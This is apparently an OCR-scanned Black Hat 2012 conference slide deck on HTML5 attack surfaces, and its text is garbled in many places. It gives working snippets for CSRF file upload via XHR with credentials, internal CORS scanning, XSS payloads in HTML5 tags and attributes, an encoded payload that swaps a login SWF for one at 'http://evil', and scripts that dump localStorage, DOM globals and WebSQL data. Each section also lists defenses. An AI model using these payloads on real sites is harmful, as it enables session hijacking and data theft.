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HTML5 - Attacks on the rise 


2012 Security 
Predictions 


2011 proved 1 
security. The : 
remember a y 
incidents and 
disastrous bn 
RSA, and Son 1 
TDL-4 and Du 
security pract 
see the likes i 


X. HTMIL5 offers five times the ways to hijack 
your website_ _ 


Rise Of HTML5 Brings With It Security Risks 

HTML5 security issues have drawn the attention of the European 
Network and Information Security Agency (ENISA), which studied 13 
HTML5 specifications .^d^grrhed bv th ^&prld Wide Web Consortium 
(W3C), and identifies! 51 security threats 


New web technologies like HTML5 
fuel the growth for next years web 
application attacks 

We predicted long ago that the 
web is the battleground for 
Internet attacks. This has proven 


HTML5 and Security 


on the New Web 

are great, "they radically change the attack model for the browser. We| 
:always hope new technologies can devoid jjiiku^s of attack. 
Unfortunately, they can also present new opportunities for 
Icybercriminals." 


Promise! 


Web developers accountable for HTML5 security 


By Jamie Yap , ZDNetAsia on October 5,201 o 


Evolution of HTML5 


Ghost of HTML5 future: Web browser botnets 
With great power comes great responsibility ... to not pwn the interweb 
" more from this author 

rity, 27th April 2012 08:01 GMT 


■_I - . . -I - _ 


1991 - HTML started (plain and simple) 

1996 - CSS & JavaScript (Welcome to world of XSS and browser security) 
2000 - XHTML1 (Growing concerns and attacks on browsers) 

2005 - AJAX, XHR, DOM - (Attack cocktail and surface expansion) 

2009 - HTML5 (Here we go... new surface, architecture and defense) - 
HTML+CSS+JS 


blacks 
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What is running - where??? 


Android 


HTML 5. 

M 


Server side 
Components 


Presentatio 

Layer 

Business 1 

.ayer 



Data Access Layer 

Authentication 

Communication etc. 


Silverlight 


Components 

(Browser) 





















HTML5 


^related fec/i 


Taxonomy & Status (December 2011) 


V^nM- 5 spec if,- ( 


W3C Recommendation 


Candidate Recommendation 


^GHTM L5s d 


Working Draft 


Non-W3C Specifications \ 


Deprecated W3C APIs 


By Serqey Mavrody 2011 I CC Attribution-ShareAlike 3.0 


Source: http://en.wikipedia.org/wiki/File:HTML5-APIs-and-related-technologies-by- 


Sergey-Mavrody.png 


Source: http://html5demos.com/ 


Evolution going on by Web Hypertext Application Technology Working Group 
(WHATWG) 


HTML5 in nutshell - Specs 


Simple class manipulation 

1009 

dasslist 

Storage events 

tttfoae 

storage 

dataset (data-* attributes) 

IO0f> 

dataset 

History API using pushState 

Browser based file reading Not part of 

HTML5 

loee 

mo # 

history 

file-api 

Drag files directly into your browser Not 
directly part of HTML5 

m * 

file-api dnd 

Simple chat client 

mom* 

websocket 

Two videos playing in sync 

DIO00 

video 

Interactive canvas gradients 


canvas 

Canvas & Video 

»movr 

video canvas 

Video 


video 

Canvas 

Content Editable 

»IO0f 

»IO00 

canvas 

contenteditable 

storage 

Geolocation Works on Safari Mobile too 

ftioae 

geolocation 

postMessage same domain 

postMessage cross domain 


postMessage 

postMessage 

drag and drop 

*m ©*> 

dnd 

drag anything 

*m 

dnd 

offline detection Works on Safari Mobile too 

mo 

offline events 


navigator.onLine tests Doesn't use events, 

**mo 

offline 

only polls 



on/offline event tests 

mo 

offline events 

offline application using the manifest FF 3.6 



is still buggy - doesn't request manifest after 

IO00 

offline manifest 

initial load 



Storage 

»|O0^ 

storage 

Web SQL Database Storage 

o 

sql-database 

Web SQL Database - rollback test 

o ©*> 

sql-database 

Web Workers watch out - uses a lot of CPU! 

a A 


example without - will hang your browser 

m ti 0 

workers 










Modern Browser Model 


Mobile 



XHR1 & 2 WebSocket Plug-in Sockets 


Browser Native 

Network Services 

f 

Network 



& Access 




f 

SO P/CO RS/Co nte nt-Sec 

z 

Sandbox 

Core 



Policies 
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• CORS Vectors 

• Ul Redressing 

• DOM Attacks 

• APIs 


Web Messaging & XHR 
Storage, File and Cache 
WebSQLand IndexedDB 
Web Workers 


Threat Model 


Presentation 


Business 

Logic 





Attacks - Stealth and Silent.. 


1 

XHR & Tags 

\_ 

\ 

A1 - CSRF with XHR and CORS bypass 

A2 - Jacking (Click, COR, Tab etc.) 

A3 - HTML5 driven XSS (Tags, Events and Attributes) 


Z' 

Thick 

Features 

\ 

V 

\ 

A4 - Attacking storage and DOM variables 

A5 - Exploiting Browser SQL points 

A6 - Injection with Web Messaging and Workers 


DOM 

\ 

A7 - DOM based XSS and issues 

A8 - Offline attacks and cross widget vectors 

A9 - Web Socket issues 

A10- API and Protocol Attacks 

_ y 


black 
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A1 - CSRF with XHR and CORS bypass 


Adobe 


HTML5 + CSS 

Silverlight 

Flash 

API (Media, Geo etc.) & Messaging 

Plug-In 


Mobile 




Presentation 


JavaScript 


DOM/Events „ Parser/Threads 


WebSQL 


XHR 1 & 2 

WebSocket 

z. 

Plug-in Sockets 

Browser Native Network Services 


SOP/CORS 


Sandbox 


black hat 
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XHR- Level 2 


w 

I 





■ m 


• XHR object of HTML5 is very powerful 

- Allows interesting features like cross origin 
request and binary upload/download 

• xhr.responseType can be set to "text", 
"arraybuffer", "document" and "blob" 

• Also, for posting data stream - DOMString, 
Document, FormData, Blob, File, ArrayBuffer 
etc... 


Q 

black hat 

□5A 








CORS & XHR 


• Before HTML5 - Cross Domain was not 
possible through XHR (SOP applicable) 

• HTML5 - allows cross origin calls with XHR- 
Level 2 calls 

• CORS - Cross Origin Resource Sharing needs 
to be followed (Option/Preflight calls) 

• Adding extra HTTP header (Access-Control- 
Allow-Origin and few others) 


blackHiat 
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HTTP Headers 


Request 

Origin 

Access-Control-Request-Method (preflight) 
Access-Control-Request-Headers (preflight) 

Response 

Access-Control-Allow-Origin 
Access-Control-Allow-Credentials 
Access-Control-Allow-Expose-Headers 
Access-Control-Allow-Max-Age (preflight) 
Access-Control-Allow-Allow-Methods (preflight) 
Access-Control-Allow-Allow-Headers (preflight) 


blackHiat 
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XHR - Stealth threats 


M ■ 


CSRF - powered by CORS and XHR 

- Hence, allow stealth channel and possible silent 
exploitation 

- One way CSRF with any stream since XHR allows 
raw stream from browser (XML, JSON, Binary as 
well) 

- Two way CSRF (POST and read both - in case of 
allow set to *) 


Q 

black hat 


J5A 2Qi; 





Silent Exploitation 


• CORS preflight bypass - certain Content-Type 
bypass preflight HTTP 

• Forcing cookie replay by "withCredentials" 

• Internal network scanning and tunneling 

• Information harvesting (internal crawling) 

• Stealth browser shell - post XSS (Allow origin- *) 

• Business functionality abuse (upload and binary 
streams) 


blackhat 

i I — /\ zn'izi 






CSRF with XHR/HTML5 



Client/Victim 

Browser 


Authentication 



Application Server 

Server 



















CSRF with XHR/HTML5 






















CSRF with XHR/HTML5 


Client/Victim 

Browser 



Leveraging XHR Call 

• Content-type to avoid pre flight 

• "withCredentials" set to true 


Session is still 
live - not yet 
logged out 


Authentication 

Server 


A 




Web Store 
Application 
Server 



Database 

Server 


black Rial 
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CSRF & HTML5 


<script lar.guage=" javascript” type=" text/javascript "> 

function getMe() 

{ 

var http; 

http = new XMLHttpRe quest () ; 

e.ashx”, true); 


http.onreadystatechange = function() 

{ 

if (http.readyState = 4) { 

var response = http.responseText; 

document.getElementById('result').innerHTML = response; 

} 

> 

http.send('{\"id\":2,\"method\":\"getProduct\",\"params\":{ \"id\" : 2}} 1 ) ; 

} 

getMe(); 

</script> 



Q 

black hat 
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CSRF with XHR/HTML5 


































CSRF & HTML5 


# host 


1 ht tp://192 .168.10 0.26 

2 http://192.16S.100.12 


method 


GET /csrf/j s on.html 

POST /json/jservice.ashx 



auto-modifled request response 
headers hex 


POST /json/jservice.ashx HTTP/1.1 
Host: 192.168.100.12 

User-Agent: Moz11la/5.0 (Windows NT 6.1; rv:5.0) Gecko/2D100101 Fi 
Accept: text/html, application/xhtml+xml, applicat ion/xinj|— * { * h ' 0 £t 
Accept-Language: en-us, en; q=0.5 ~ http:W192.168.100.26 

Accept-Encoding: gzip, deflate 2 http:tf192.168.100.12 

Accept-Charset: TSO-S359-1,utf-S;q=0.7,*;g=0.7 

Proxy-Connection: keep-alive * I 

Content-Type: text/plain; charset=UTE-8 original request! 

n -"erer: httra://192.168.100.26/csrf/json.html 


method _ 

GET /csrf/j son, html 
POST /json/jservice.ashx 


original request f auto-modified request 


cid= 10001 


Pragma 


Content-Length 


getProcluct 


HTTP/1.1 2 □□ OK 

Date: Sun, 27 Nov 2011 22GHT 
Server: Microsoft-IIS/6.□ 

X-Powered-By: ASP.NET 
Cache-Control: no-cache 
Pragma: no-cache 
Expires: -1 

Content-Type: text/plain; charset=utf-B 
Content-Length: 921 

{ "id":2,"result": { "Products":{"columns": ["product_id","produet_name","pro 
t_desc","product_price","image_path","rebates_file"],"rows":[[2,"Bend it 
Drama","Who wants to cook Aloo Gobi when you can bend a ball like Beckham 
London tries to raise their soccer-playing daughter in a traditional way. 
sister. Pinky, who is preparing for an Indian wedding and a lifetime of c 
chapatti, Jess' dream is to play soccer professionally like her hero Davi 
against Jess' unorthodox ambition, her parents eventually reveal that the 
to do with protecting her than with holding her back. When Jess is forced 


Q 

black Hat 
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CSRF/Upload 


• Powerful XHR-Level 2 call allows file upload on 
the fly. 

• Interestingly - possible to craft file through 
JavaScript and post on the server - if CSRF token 
is not there. 

• Example, your profile is having a photograph of 
yours and you visit attacker site that photo 
changes to something else 

• More serious threat, exploiting actual business 
functionalities... 


Q 

black^t 
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CSRF with XHR/HTML5 


Browser 

j~| cnjwy yum anuppmij lenue cjl u 



Products ( 1.0 | XML | Flash | JSON | Sliverlight | AMF | HTML5 ) 


Shreeraj Shah (U=10001) Main | New Order | Order Status | Profile | Blog | Logout 


J 


upload your order form 


Browse 


Upload | Processing uploaded order... 


Accept: text/html,application/xh 

Accept-Encoding: gzip, deflate 
Accept-Charset: IS0-8859-1,utf-8;q=0.7,*;q=0.7 
Proxy-Connection: keep-alive 

Referer: http://192.168.108.21/user_upload.aspx 

Cookie: cid-10001; DerooTrading=1990b5bf9dde249a38ffc352f7b3e52b; ASP.NET_S 
JSESSI0NID=8B59BiD6iDFAFE7CEF97AFB03A103D13 

Content-Type: multipart/form-data; boundary=-313223033317673 




3223033317673 


nt-Type: applies 


Authentication 

Server 



Web Store Database 

Application Server 

Server 







































CSRF/Upload - POC 


CMj'-'y yuui =1 1 1 1_| |_||_| 1 1 1 y t:.::. |_| t: i 1 1 1 i^_t: dL uv uzi-m- i t:=i =, 


Products ( 1.0 | XML | Flash | JSON | Sliverlight | AMF | HTML5 ) 


upload your o rder Form | Browse... 

| Upload j Processing uploaded order... 


POST /user _upload.aspx HTTP/1.1 
Host: 192.168.100.21 

User-Agent: Hocilla/5.0 (WindowsNT 6.1; rv:S.0.1) Gecko/20100101 Firefox/8.0.1 
Accept: text/htinl, application/xhtml+xml, application/xml; q=0 .9, */ *; q=D . 8 
Accept-Language: en-us,en;q=0.5 
Accept-Encoding: gzip, deflate 

Accept-Charset: ISO-BB59-1,utf-B;q=0.7,*;q=0.7 
Proxy-Connection: keep-alive 

Referer: http://192.168.100.2l/user_upload.aspx 

Cookie: cid= 10001; DemoTrading= 1990b5bf9dde2 49a3 8ff c3 52 f7b3 e52b ; ASP . NET_Sess ionTd=3 ife> 
JSESS T0NID = 8B59BID 6 IDF AFE7CEFS7AFB03 A103 D13 

Content-Type : multipart/form-data; boundary=-3 13 22303 3 3 17 673 

Content-Length: 262 

-313223033317673 

Content-Disposition: form-data; name= "F TLE1 "; file name ="to day " 

Content-Type: application/octet-stream 

Client: ABC inc. 

1.1, Finding Nemo 

2.1, Bend it like Beckham 

-313223033317673— 
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CSRF with XHR/HTML5 


yar stream - "Client: ABC inc.\r\nl, 2,Finding Nemo\r\n2,4,Bend it like Beckham"; 
var boundary = "-1460439021S3"; //Pick boundary for upload 

http = new XMLHttpRequest() ; 

http.open("POST", "http://192.168.100.21/user_upload.asps' 
http.setRequestKeader("Content-Type", "multipart/form-date 

http.setReque3tHeader("Content-Length", stream.length); 
http.withCredentials= "true"; 

yar body = boundary + "\r\n"; 
body 4= 'Content-Disposition: form-data, 
body += "Content-Type: application/octei 

body += boundary + "—"; 


Attacker's 

Site 


oody) ;| 



Authentication 

Server 


I XHR initiates HTTP multi-part - Upload ^ 

Success - cookie replayed 





Client/Victim 

Browser 


Web Store 
Application 
Server 


Database 

Server 


JSESSIONID=8B59B1D£1DFAFE7CEF97AFB03A103D13 




Hence, 

• Without victim's consent or notice 

• Stealth HTTP Upload takes place 

• Silent Exploitation... 
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h t tp = nerv XMLHt tpRe qiie s t O ; 

http.open("POST", "http://192.168.100.21/user_upload.aspx n f true) ; 

http. setReqiie at Heads r (" C on t er. t -T yp e n , " mu 11 ip a r t / f o rm- data, hour, da r y= " +h our. da r y > ; 

http.setRequestEeader { "Content-Length ", stream.length}; 

ht tp.withC x e dentia13= "t xue n ; 

var body = boundary + "\r\n n ; 

body += 1 Content-Disposition: form-data; name="FILEl"; filename="' + file + 1 "\r\n 1 ; 
body += "Content-Type: application/octet-stream\r\n\r\n n ; 
body += stream + "\r\n"; . ldVV I ^ dldlM& I Meduei * I '■** I 

body += boundary + "— 



-14 £043 902153 


POST /user_upload.aspx HTTP/1.1 
Host: 192.1£8.100.21 

User-Agent: Hozilla/5.0 (Windows NT 6.1; rv:8.0.1) Gecko/20100101 Firefox/8.0.1 
Accept: text/html, app1ication/xhtml+xml, app 1 icat ion/xml; q=Q .9, */ *; q=0.8 
Accept-Language: en-us,en;g=0.5 
Accept-Encoding: gzip, deflate 

Accept-Charset: ISO-8859-1,utf-8;q=0.7, *;q=0.7 
Proxy-Connection: keep-alive 

Content-Type: multipart/form-data; charset=UTF-8, boundary=- 

Referer: http://192.1£8.100.6/upload/csrf-up.html 

Content-Length: 255 

Origin: http://192.168.100.£ 

Cookie: cid= 10001; DemoTrading=1990b5bf 9dde249a3Bffc352f7b3e52b; ASP.NET_SessionTd=3 ifeql4502ukzijxs 
JSESSI0NID = BB59B1D61DF AFE7CEF97AFB03A1D3D13 
Pragma: no-cache 
Cache-Control: no-cache 

-146043902153 

Content-Disposition: form-data; name= ,r FTLE1 rr ; filename= "order . prod" 

Content-Type: application/octet-stream 

Client: ABC inc. 

1,2,Finding Nemo 

2,4,Bend it like Beckham 

-146043902153 — 


black hart 

□5A 










Crawl for CORS 


Cscript> 




for ( i=2 0 ; i<=2 5 ;i++) 

{ 

target = "http://192.168.100."+i+"/" 

st = scan(target) 

if<st=fcrue) 

status += "<bt: "+target+"(Access-Control-Allow-Origin: 

document.getElementByld(’result 1 ).innerHTML = status 

} 

</script> 

{ 

try 

{ 

http = new XMLHttpRequest(); 
http.open("GET", url, false); 
http.send() ; 
return true; 

) 

catch {err) 

( 

return false; 

) 


Client/Victim 

Browser 


Internal We 
Server 


Internal Web 
Mail 


http: /192.168.100.21/(Access-Control- Aflow-Origin:->tnie) 


Internal HR 
Application 


| Li 192.168.100.6 portscan/scan.html 


T 

0 Disable* A Cookies’ / CSS’ ||Sj Forms’ □ Images’ (Qjl Information’ |Q Mi; 


Q 

black! 
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Internal Scan for CORS 


function 3can(url) 

|{ 

try 

i 

http = neiv XMLHttpRequest {) ; 
h11p . op en ( 11 GET n , or 1 r fa I se } ; 
http.send{); 
return true; 

} 

catch {err} 

{ 

return false; 

} 



iscript> 

for{ i=2Q;i<=25 ;i++) 

target = "http ://192.163.100 . ,, +i + ,, / n 
st = scan(target) 

If {s t^ true)' 

status += "<br> rr +target + 11 (Access-Comtrol-Allow-Origin: -> w +st + n ) n 

document. ge tE 1 ementB y Id ( 'result 1 } . innerHTML = status 

£/scrlpt> 


L. j 192.168.100.6 ■ p o ft: c a n/ : c a n. htm I 


Disable’ 


Cookies’ CSS’ Forms’ Q Images’ ^ Information’ Q j Mi 


Scan results 

http -J! 192.163.100.21 /(Access-Control-Allow- Origin:->trae) 


raw headers hex html ' render 


HTTP/1.1 200 OK 

Date: Thu, 16 Feb 2012 07:22:58 GMT 
Access-Control-Allov-Origin: * 

Server: Microsoft-ITS/6.0 
X-Povered-By: ASP.NET 
X-AspNet-Version: 2.0.50727 
Cache-Control: private 

Content-Type: text/html; charset=utf-8 
Content-Length: 13456 

<htmlxhead> 

<meta http-equiv= "content-type" content = "text/html; charset=UTF-8"> 
<tit le>Store</ 1itlex/headxbody class= "background":* 

<* — 
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File APIs &XHR 


• It is possible to use File API to power XHR 
calling or possible abuse 

• Uploading/drag-drop for file and directory are 
possible 

• Hence, it is possible to force user by bluff to 
click on selecting download folder and then 
actually uploading content of folder on server 

- Browsers are supporting these calls 

- Another attack surface opening via File APIs 



usa 
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Scan and Defend 


Scan and look for 

- Content-Type checking on server side 

- CORS policy scan 

- Form and Upload with tokens or not 

Defense and Countermeasures 

- Secure libraries for streaming HTML5/Web 2.0 
content 

- CSRF protections 

- Stronger CORS implementation 


Q 

black hat 
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A2 - Jacking (Click, COR, Tab etc.) 


Mobile 



SOP/CORS 





Core 

Policies 


ClvrlciI 

JbA 
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Click/COR-Jacking 


w m 


Ul Redressing (Click/Tab/Event Jacking) attack vectors 
are popular ways to abuse cross domain HTTP calls 
and events. 

HTML5 and RIA applications are having various 
different resources like Flash files, Silverlight, video, 
audio etc. 

If DOM is forced to change underlying resource on 
the fly and replaced by cross origin/domain resource 
then it causes Cross Origin Resource Jacking 
(CROJacking). 


O) 

black hat 
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• Iframe is having new attributed called sandbox 

• It allows frame isolation 

• Diabling JavaScript on cross domain while loading 

- bypassing frame bursting script 

- <iframe src="http://192.168.100.21/ M 

sandbox="allow-same-origin allow-scripts" height="x" 
width="x"> - Script will run... / 

- <iframe src="http://192.168.100^$' 
sandbox="allow-same-origin" beight="500" 
width="500"> - script will not run - Clickjacking 


Q 

black ha* 
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CORJackin 


It is possible to have some integrated attacks 

— DOM based XSS 

— Single DOM usage/One page app 

— Flash 

DOM based issue can change flash/swf file - it 
be changed at run time - user will not come to 
know.. 

Example 

— document.getElementsByName("login").item(0).src 
" http ://evil/login.swf" 



usa 




CORJacking 


• Possible with other types of resources as well 

• Also, reverse CORJacking is a possible threat 

Cobject classid="clsid: D27CDB6E-AE6D-llcf-9633-444553540000” 
id= "Login" width=”100%” height=”1000%" 

codebase= r, http: //fpdownload.ir.acroir.edia. com/get/flashplayer/current 
.ash.cab r, > T 

<param name ="ir.o vie" 

<param name= M quality” value="high" /> 

<param name= f 'bgcolor" value= ,, #869ca7 rr /> 

<param name^'allowScriptAccess" value^'sair.eDoir.ain" /> 

<embed src= r ' Login. swf w quality= r, high" bgcolor= r, #369ca7 rr 

width= r, 5Q%" height="50%” name=”Login" align="irjLddle" 


Console ▼ HTML CSS Script DOM Net Shared Objects Flash Console P 


]q | Clear Persist Profile 

All Errors Warnings Info Debug Info 

document .getElementsByName ('Login') .item{0) .arc 

O syntax error 

alert ( %22hi%22) Login....t("hi") (line 57) 

»> document . getElenent3ByName (' Login * ) .item<0) .arc 

"http://192 . 168 . 100 . Ill : 8080/flex/teatHelloWorldl/Login . awfj 


Run Clear Copy History ^ 


Q 

black hat 
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Double eval - eval the eval 


Payload - 

document. getElementsByName('Login').i : 
m(0).src='http://192.168.100.200:8080/flex/ 
Loginn/Loginn.swf 



Converting for double eval to inject' and " 
etc... 


- eval(StringiromCharCode(100,lll,99,117,109,101,110,116,46,103, 
101,116,69,108,101,109,101,110,116,115,66,121,78,97,109,101,40, 
39,76,111,103,105,110,39,41,46,105,116,101,109,40,48,41,46,115, 
114,99,61,39,104,116,116,112,58,47,47,49,57,50,46,49,54,56,46,49 
,48,48,46,50,48,48,58,56,48,56,48,47,102,108,101,120,47,76,111,1 
03,105,110,110,47,76,111,103,105,110,110,46,115,119,102,39)) 



black haft* 
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Scan and Defend 

* » * » . — — 


• Scan and look for 

- Clickjacking defense code scanning 

- Using X-FRAME-OPTIONS 

• Defense and Countermeasures 

- Better control on CORS 

- Creating self aware components and loading after 
checking the domain 


blackHiat 
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A3 - XSS with HTML5 (tags, attributes 

and events) 



SOP/CORS 


Sandbox 


Core 

Policies 


Q 
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HTML5 - Tags/Attributes/Events 


• Tags - media (audio/video), canvas 
(getlmageData), menu, embed, 
buttons/commands, Form control (keys) 

• Attributes - form, submit, autofocus, sandbox, 
manifest, rel etc. 

• Events/Objects - Navigation (_self), Editable 
content, Drag-Drop APIs, pushState (History) 
etc. 



Q 

black Fiat 
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XSS variants 


Media tags 
Examples 

- <videoxsource onerror="javascript:alert(l)"> 

- <video onerror="iavascript:alert(l) M ><source> 


192.16810020-'search.aspx?search= <video<source^cnerror%3D , javascript%3Aalert(l)"> | 

Cookies” / CSS” Forms” Q Images” Information” Q Miscellaneous” ** Outline” ^ R 



MAIN 


Catalog 

Rebates 

Login 

Search 

Blog 

Widgets 

Mashup 


Welcome to d 


Welcome to dv< 
store is open 2 
take a holiday 
select the item; 
transactions ar< 


OK 


Should you hav 
Enjoy your shopping experience at dvds4!es 


im 

•ea 

hop 

red 


he 
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XSS variants 


• Exploiting autofocus 

- <input autofocus onfocus=alert(l)> 

- <select autofocus onfocus=alert(l)> 

- <textarea autofocus onfocus=alert(l)> 

onfocus=alert(l)> 

lookies* / CSS" ,5§j Forms" Q Images* v Information" £4 Miscellaneous* y* Out 





Q 

black hat 

UbA 


42 






















XSS variants 

till - _ - ■ M 


Form & Button etc. 

- <form id="test" /xbutton form="test 
formaction="javascript:alert(l)">test 

- <formxbutton 

formaction="javascript:alert(l) M >test 

Etc ... and more ... 

- Nice HTML5 XSS cheat sheet 
(http://html5sec.org/) 
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Scan and Defend 

r i i v ^ ^ 

r , * |*|Hp 
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Scan and look for 

- Reflected or Persistent XSS spots with HTML5 tags 

Defense and Countermeasures 

- Have it added on your blacklist 

- Standard XSS protections by encoding 


Q 
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A4 - Web Storage and DOM 
information extraction 


Mobile 
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Silverlight 

Flash 

API (Media, Geo etc.) & Messaging 

Plug-In 




Presentation 


W 


JavaScript 


DOM/Events 


Parser/Threads 


Process & (logic 


WebSQL 


XHR 1 & 2 


WebSocket 

Plug-in Sockets 

Bn 

3 wser Native Network Services 


SOP/CORS 


Sandbox 


Network 
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Core 

Policies 
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Web Storage Extraction 


• Browser has one place to store data - Cookie 
(limited and replayed) 

• HTML5 - Storage API provided (Local and 
Session) 

• Can hold global scoped variables 


• http://www.w3.org/TR/webstorage/ 



interface Storage £ 

wwvwwvv^wiyvw 

readonly attribute unsigned long length; 

WWvWvVWvWTv 

getter DQMString key{in unsigned long index) ; 
getter any getltemfin DOMString key); 

setter creator void setlterifin DOMString key- in any data); 
deleter void xenoveltenlin DOMString key); 
void clear!); 

VWvVWv 1 

}; 
















Web Storage Extraction 


• It is possible to steal them through XSS or via 
JavaScript 

• Session hijacking - HttpOnly of no use 

• getltem and setltem calls 

</script> 

Ocript t ype =rT text/javascript n > 

localStorage . 3etltem ( 'hash ' f ' If e4f 213ccld3d936caefc>9ac31'6df f cc ’) ; 
function ajaxget () 

{ 

var HLygetrequest=new ajaxReque3t () 
mygetrequest.onreadystatechange=function () { 
if (mygetrequest.readyState==^ ) 

{ 

• XSS the box and scan through storage 


Q 
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if(localStorage.length){ 

console.log(localStorage.length) 
for(i in localStorage){ 
console.log(i) 

console.log(localStorage.getltem(i)); 


• Above code allows all storage variable 


extraction 


> if(lccalStorage E length){ 


console . log (local St enrage . length) 


for(i in localStorage){ 
console.log(i) 

console.lcg(lccalStorage.getltem(i)) 


} 

> 

1 



undefined 


hash 

lfe4f21SccldSd9S6caeb9ac316dffcc 



File System Storage 


HTML5 provides virtual file system with 
filesystem APIs 

— window.requestFileSystem = 
window.requestFileSystem 11 
window. webkitRequestFileSystem; 

It becomes a full blown local system for 
application in sandbox 

It empowers application 


Q 
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File System Storage 


• It provides temporary or permanent file 
system 

function init() { 

window.requestFileSystem(window.TEMPORARY, 1024*1024, 
function(filesystem) { 

filesys = filesystem; 

}, catcherror); 

} 

• App can have full filesystem in place now. 


Q 

black Hat 
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Sensitive information filesystem 


Assuming app is creating profile on local 
system 


<- 


15 

16 
17 
13 

19 

20 
21 
22 
23 


□ function profile (>{ 

filesys.root.getFile('profile' r {create: true) r function (entry) { 
R entry.createWriter( function (writer) { 

tar rayblob = n&w window.WebKitBlobBuilder(); 

myblob . append ( 'Token: 0912 32 432 r name : Jack, autti: true r ) ; 

writer.write(myblob.getElob('text/plain*)); 

> r catcherror}; 

} r catcherror); 


> 


C fi I © fi lesyste m :http://loca I host/te m po ra ry/ C ft | © filesystemti localhost 


Token:0912 32 4 32 f name:Jack, auth:true 

Index of 


Name Size Date Modified 

C profile 35 B 6/19/12 2:22:10 PM 


- ■ 


black 
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25 

26 

27 

23 

29 

30 

31 

32 

33 

3 ^ 

35 

36 

o -r 


co-m 


Extraction through XSS 


Once have an entry point - game over! 


H function getProf lie ■() { 


filesys.root.getFile('proflie r function (entry) { 

entry. file { function { file > { 

var reader = reu r FileReader() ; 
reader.onloadend = function (e) { 

alert { this. result) ; 

}; 

reader.readAsText(file); 

} f catch,error) ; 

} r catcherror); 
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I 


% 


vs 


A 


DOM Storage 




• Applications run with "rich" DOM 

• JavaScript sets several variables and parameters 
while loading - GLOBALS 

• It has sensitive information and what if they are 
GLOBAL and remains during the life of application 

• It can be retrieved with XSS 

• HTTP request and response are going through 
JavaScripts (XHR) - what about those vars? 


Q 
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Blind Enumeration 


for(i in window){ 
obj=window[i]; 
try{ 

if(typeof(obj)=="string"){ 
console.log(i); 
console.log(obj.toString()); 


} 

}catch(ex){} 


} 


Q 
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Global Sensitive Information Extraction from DOM 


HTML5 apps running on Single DOM 

Having several key global variables, objects 
and array 
- var arrayGlobals = 

['my@email.com',"12141hewvsdr9321343423mjf 
dvint","test.com"]; 

Post DOM based exploitation possible and 
harvesting all these values. 



Q 

black Fiat 

□5A 


55 





Global Sensitive Information Extraction from DOM 


for(i in window){ 
obj=window[i]; 
if(obj!=null | |obj!=undefined) 
var type = typeof(obj); 
if(type=="object" 11 type=="string") 
{ 

console. log("Name:"+i) 
try{ 

my=JSON.stringify(obj); 
console.log(my) 



}catch(ex){} 


Name :a ee a yGl cba1a 

[ "my @email _ ccm 1 ' r l, 12141hewadES321343423mj fdvint" r "teat. ccm" ] 

Name : j a c n£l cba 1 

{ lp f iiatHame 11 :"Jchn” r "laatName": "Smith 11 „ "addteaa": { "atEeetAddEeaa" : "21 2nd Street", "city" : 1 
YcEk'\ ,F atate"::"NY" r "poatalCnde": 10021} F "phcneNumbera": ["212 732-1234", ”646 123-45G7”] } 

Name:: atEing-eicbal 
"test^teat.c cm 1 ' 
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Scan and look for 

- Scanning storage 

Defense and Countermeasures 

- Do not store sensitive information on localStorage 
and Globals 

- XSS protection 


Q 
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A5 - SQLi & Blind Enumeration 
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^ „ van 

SQL Injection 

lilt _ 


WebSQL is part of HTML 5 specification, it 
provides SQL database to the browser itself. 

Allows one time data loading and offline 
browsing capabilities. 

Causes security concern and potential 
injection points. 


Methods and calls are possible 

□penDatabase 

wwww^yvwwwww 

executes a I 


Q 
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SQL Injection 


Through JavaScript one can harvest entire 
local database. 

Example 


Elements : _j Resources Network Scripts i incline ^ Profiles Audits ^ Console 

► Q F ra mes 

1 > SELECT * from Trans 

T ; Databases 

id 

text 


100001 

Tra nsfer to Joh n 

Trans 

100002 

Transfer to Bob 

► [^j Local Storage 

> 


► Session Storage 



► Cookies 



► [^Application Cache 




Q 
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Blind WebSQL Enumeration 


We need following to exploit 

- Database object 

- Table structure created on SQLite 

- User table on which we need to run select query 


O) 
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Blind WebSQL Enumeration 


var dbo; 
var table; 
var usertable; 
for(i in window){ 

obj = window[i]; 
try{ 

if(obj.constructor.name=="Database"){ 
dbo = obj; 

obj.transaction(function(tx){ 

tx.executeSql('SELECT name FROM sqlite_master WHERE 
type=\'table\",[],function(tx,results){ 

table=results; 


},null); 


}); 


} 

}catch(ex){} 


} 

if(table.rows.length>l) 

usertable=table.rows.item(l).name; 


black hat 
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Blind WebSQL Enumeration 


We will run through all objects and get object 
where constructor is "Database" 

We will make Select query directly to 
sqlite_master database 

We will grab 1 st table leaving webkit table on 
0 th entry 


blackHiat 
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► CD Frames 


> SELECT * from ITEMS 


; Databases 

pro 

pro... 

pro 

1 

Fin... ' 

Ad... 


4-i Local Storage 

2 

3 

Be . 

Do.. 

Co... 

Dr... 

§§ 192.168.100.27 

4 

A... 

Fa... 

Session Storage 

5 

La... 

Mu... 

£192.168.100.27 

e 

Mo... 

Co... 

jf Cookies 

_1 ;-; ill i ~ - —_ 

7 

La.. 

Ad... 


There are 3.7 trillion fish in the ocean, they’re looking for one. The Academy Award-winning creators of... 
Who wants to cook Aloo Gobi when you can bend a ball like Bedcham' 7 An Indian family in London tries 
David Lean s DOCTOR ZHIVAGO is an exploration of the Russian Revolution as seen from the point of vi 
An epic of miniature proportions. Life is no picnic for the ants on Ant Island! Each summer, a gang of gre . 
Once upon a time in India. Lagaan is the story of a battle without bloodshed fought by a group of unlikel 
The Rain is coming... and so is the Family. An extended Punjabi family gathers for an arranged wedding 
From the creators of - The Bridge on the River Kwai. Sweeping epic about the real life adventures of T.E 

■mi 


Pr... 

im... 

14... 

ne... 

12... 

be... 

10... 

zhi... 

13... 

bu... 

12... 

la... 

10.. 

m... 

14... 

la... 
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X 



\ 




\ 


IndexedDB 


Y 

i 





Similar to WebSQL - it is available for 
applications 



Allows to create database and it is indexed 
store 


- indexedDB.open("trareactions"); 

- db.createObjectStore 

Possible to enumerate like WebSQL and 
possible information extraction 


blackHiat 
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A6 - Web Messaging and Web 
Workers injections 


Mobile 



SOP/CORS 


Sandbox 


o 


ClvrlciI 

JbA 


Core 

Policies 


































Web Messaging 


• HTML5 is having new interframe 
communication system called Web Messaging. 

• By postMessage() call parent frame/domain 
can call with the iframe 

• Iframe can be loaded on cross domain. Hence, 
create issues - data/information validation & 
data leakage by cross posting possible 

• worker.webkitPostMessage - faster 
transferable objects 


O) 
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Web Messaging - Scenario 


If postMessage() is set to * so page can be 
loaded in iframe and messaging can be 
hijacked 

Also, origin is not set to fixed then again frame 
listen from any domian - again an issue 

Stream coming needs to be checked before 
innerHTML or eval() 

